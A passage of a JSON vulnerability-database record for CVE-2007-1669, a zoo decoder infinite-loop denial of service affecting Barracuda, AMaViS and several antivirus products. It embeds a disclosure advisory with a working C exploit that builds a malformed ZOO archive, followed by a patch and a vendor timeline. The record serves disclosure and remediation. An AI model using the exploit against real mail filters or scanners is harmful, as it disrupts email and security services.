                    "cpe23Uri": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.4.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2007-1669",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-1669",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-25031",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-1669",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200705-120",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-25031",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nJoin the FREE BETA test of the Network Software Inspector (NSI)!\nhttp://secunia.com/network_software_inspector/\n\nThe NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\nThe vulnerability is caused due to an error in the handling of Zoo\narchives. This can be exploited to cause an infinite loop resulting\nin high CPU utilisation. \n\nSOLUTION:\nUpdate to firmware version 3.4 and virus definition 2.0.6399 or\nlater. \n\nPROVIDED AND/OR DISCOVERED BY:\nJean-Sebastien Guay-Leroux\n\nORIGINAL ADVISORY:\nBarracuda Networks:\nhttp://www.barracudanetworks.com/ns/resources/tech_alert.php\n\nJean-Sebastien Guay-Leroux:\nhttp://www.guay-leroux.com/projects/zoo-infinite-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked between themselves with a\n\u0027next\u0027 pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  By specifying an\nalready processed file, it\u0027s possible to process more than one time this\nsame file.  The ZOO parser will then enter an infinite loop condition. \n\n\nIII.    AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware \u003e= 3.4 and\n   2.0.6399o for firmware \u003c 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data \u003e\u003e 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data \u003e\u003e 8);\n         put_byte (ptr + 2, data \u003e\u003e 16);\n         put_byte (ptr + 3, data \u003e\u003e 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s \u003carchive name\u003e\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         }\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it\u0027s not possible to process the same files over\nand over again.  Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? */\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr \u003c= zoo_pointer)\n+          prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (\u0026zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list \u0026\u0026 !fast)\n              show_comment (\u0026direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already processed data */\n+      if (direntry.next \u003c= zoo_pointer)\n+               prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-25031",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-1669",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "23823",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "25122",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "25315",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-1699",
        "trust": 1.7
      },
      {
        "db": "SREASON",
        "id": "2680",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "35795",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "34080",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
        "trust": 0.6
      },
      {
        "db": "VIM",
        "id": "20070724 ZOO - AMAVIS - BARRACUDA CROSS-REF PROBLEMS",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "3851",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-25031",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56548",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56479",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "id": "VAR-200705-0183",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:12:33.927000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://amavis.org/"
      },
      {
        "title": "Barracuda Spam \u0026 Virus Firewall",
        "trust": 0.8,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-DesignError",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/23823"
      },
      {
        "trust": 1.7,
        "url": "http://www.amavis.org/security/asa-2007-2.txt"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/35795"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/25122"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/25315"
      },
      {
        "trust": 1.7,
        "url": "http://securityreason.com/securityalert/2680"
      },
      {
        "trust": 1.7,
        "url": "http://www.attrition.org/pipermail/vim/2007-july/001725.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2007/1699"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1669"
      },
      {
        "trust": 0.6,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/34080"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/1699"
      },
      {
        "trust": 0.3,
        "url": "http://www.avast.com"
      },
      {
        "trust": 0.3,
        "url": "http://www.avira.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.pandasoftware.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.picozip.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.winace.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/467646"
      },
      {
        "trust": 0.3,
        "url": "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c"
      },
      {
        "trust": 0.1,
        "url": "http://www.barracudanetworks.com/ns/resources/tech_alert.php"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/network_software_inspector/"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/4639/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/25122/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-05-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "date": "2007-05-04T00:00:00",
        "db": "BID",
        "id": "23823"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "date": "2007-05-10T00:32:46",
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "date": "2007-05-04T16:51:04",
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "date": "2007-05-09T00:19:00",
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "date": "2007-05-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "date": "2016-07-06T14:39:00",
        "db": "BID",
        "id": "23823"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "date": "2018-10-16T16:40:20.380000",
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "date": "2007-05-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Barracuda Spam Firewall Used in etc.  zoo decoder Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "CNNVD",
